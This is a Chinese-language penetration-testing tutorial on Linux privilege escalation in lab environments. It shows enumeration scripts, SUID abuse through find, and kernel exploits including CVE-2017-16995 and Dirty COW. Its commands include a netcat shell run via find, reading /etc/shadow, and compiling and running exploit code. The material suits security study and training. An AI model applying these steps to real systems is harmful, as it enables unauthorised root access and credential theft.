基础19-权限提升之Linux提权【上】

gclome

原文链接：基础19-权限提升之Linux提权【上】

​
内容目录案例1-linux好用的4个信息收集脚本演示案例2-linux提权之SUID配合脚本提权演示案例3-linux提权之内核漏洞提权演示3.1 内核漏洞本地提权-CVE-2017-169953.2 内核漏洞本地提权-webshell脏牛提权
案例1-linux好用的4个信息收集脚本演示
两个信息收集：

1. LinEnumlinuxprivchecker

复制代码

两个漏洞探针：

1. linux-exploit-suggester linux-exploit-suggester2

复制代码

需要解释：信息收集有什么用哦？漏洞探针又有什么用哦？
在windows提权时，我们需要使用systeminfo命令查询系统信息，而在linux中，我们就需要脚本来帮助我们更快更好的收集信息。
1.LinEnum项目使用
只需要使用webshell权限将linenum项目上传到对方服务器。
一般提权后上传的文件路径上传到tmp目录下，因为这个目录一般是有可读可写可执行的权限。
如果运行不了，给他赋值一个可执行权限。

​

2.linuxprivchecker(py2脚本)
对方服务器要装有py2环境，不然搞不来。

​

3.linux-exploit-suggester使用

​

将系统信息以及将可能存在的漏洞及漏洞地址也给出来了，非常贴心。
4.linux-exploit-suggester2
二版本使用的是pl脚本，显示内容比第一版简洁，误报少。

​

​

​

案例2-linux提权之SUID配合脚本提权演示
SUID-Set User ID
跨越用户权限执行。

​

这里我们用跑普通用户再去运行 linux-exploit-suggester2时，会使用root用户对它执行。
漏洞成因：chmod u+s 给予了 suid u-s 删除了 suid
提权过程:探针是否有 SUID(手工或脚本)-特定 SUID 利用-利用吃瓜-GG
尝试查找具有root权限的SUID的文件。
第一步：探针是否存在suid提权的可能，手工或者脚本
使用冰蝎，这里可以使用反弹shell，反弹到我们的服务器的msf端。

成功接收到。
查看当前权限。

www权限，web权限。
第二步，使用信息收集脚本，查看是否存在SUID提权的可能。
我们这里将linux-exploit-suggester脚本上传到对方服务器上。


成功上传。

执行成功后找到SUID file栏，查看是否存在如下信息。
Nmap
Vim
find
Bash
More
Less
Nano
cp（然而我换了两个系统，装了vim也找不到。）
由于我这样没有SUID提权可利用点，所以我使用find提权返回的还是www权限

​

这里用迪哥成功的图进行下面的演示。
第三步，找到了find可提权项，执行下面命令。
命令：
touch xiaodi
find xiaodi -exec whoami ;​​​
返回了root权限。
接下来利用find反弹shell；

• 1. find xiaodi -exec netcat -lvp 5555 -e /bin/sh ;

  复制代码
  
  

由于find继承的是root权限，所以反弹的shell也是root权限。
服务器端进行监听，然后执行命令，查看 /etc/shadow


命令:

1. netcat 192.168.1.189 5555
   
2. idcat
   
3. /etc/shadow

复制代码

---

​

成功提权。
参考文章:
https://pentestlab.blog/2017/09/25/suid-executables
【非常全，利用全部都在文章中有写】

不利用脚本使用手工探测SUID命令
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ;

---

​

​

案例3-linux提权之内核漏洞提权演示

​

3.1 内核漏洞本地提权-CVE-2017-16995
Ubuntu 16.04漏洞复现【墨者靶场】
提权过程：连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG

​

第一步，建立连接。

第二步，信息收集，使用我们当时用过的linux-exploit-suggester2，上传到对方tmp目录下[因为这个目标一般有读可写可执行权限]


执行后给出了四个可能存在的漏洞。
【如果实战中我们就要一个个去尝试，因为这里是靶场，所以我们直接利用cve-2017-16695进行利用】
第三步：上传我们找到的利用exp，继续上传到tmp目录下，这里需要进行编译，再运行生成的文件。
命令：
gcc 45010.c -o 45010 #编译刚45010.c
chmod +x 45010 #给编译好的45010赋值
./45010 #运行

​

1
3.2 内核漏洞本地提权-webshell脏牛提权
这里使用的是vulnhub靶场。
地址：https://www.vulnhub.com/entry/lampiao-1,249

​

第一步：需要密码，我们要先找到靶场的ip
nmap扫描当前虚拟机网段，找到了靶场的ip

再次扫描ip所有端口，发现1898端口


通过识别CMS，我们这里知道他是Drupal搭建的，这个cms是有很多漏洞的。

第二步：漏洞利用，这里直接使用msf，找到2018这个漏洞模块，进行利用。

利用成功。
第三步:提权准备，上传一下我们的信息收集脚本，运行看看。

这里我们利用脚本测试出来的可能漏洞进行测试，
【这里我用了两个linux-exploit-suggester，第一版和第二版】
第二版比较尴尬，没有判断出CVE-2016-5195(脏牛)

所以第二版虽然精简，但是可能有时候不上特别全面，建议实际渗透中两个都用，宁可错杀一千，也不放过一个。

这里我们使用第一版扫描出来的进行后续利用。
第四步:下载利用exp，上传到靶机服务器，编译运行。
【同样，也可以利用wget命令在靶机是直接下载】

1. EXP:https://github.com/mzet-/linux-exploit-suggester
   
2. g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40837.cpp -lutil

复制代码

​

编译完成。
命令：(使用py作为一个伪终端)python -c 'import pty; pty.spawn("/bin/bash")'

​

运行

我们再切换用户，su root输入密码

获得root权限，提权成功。
​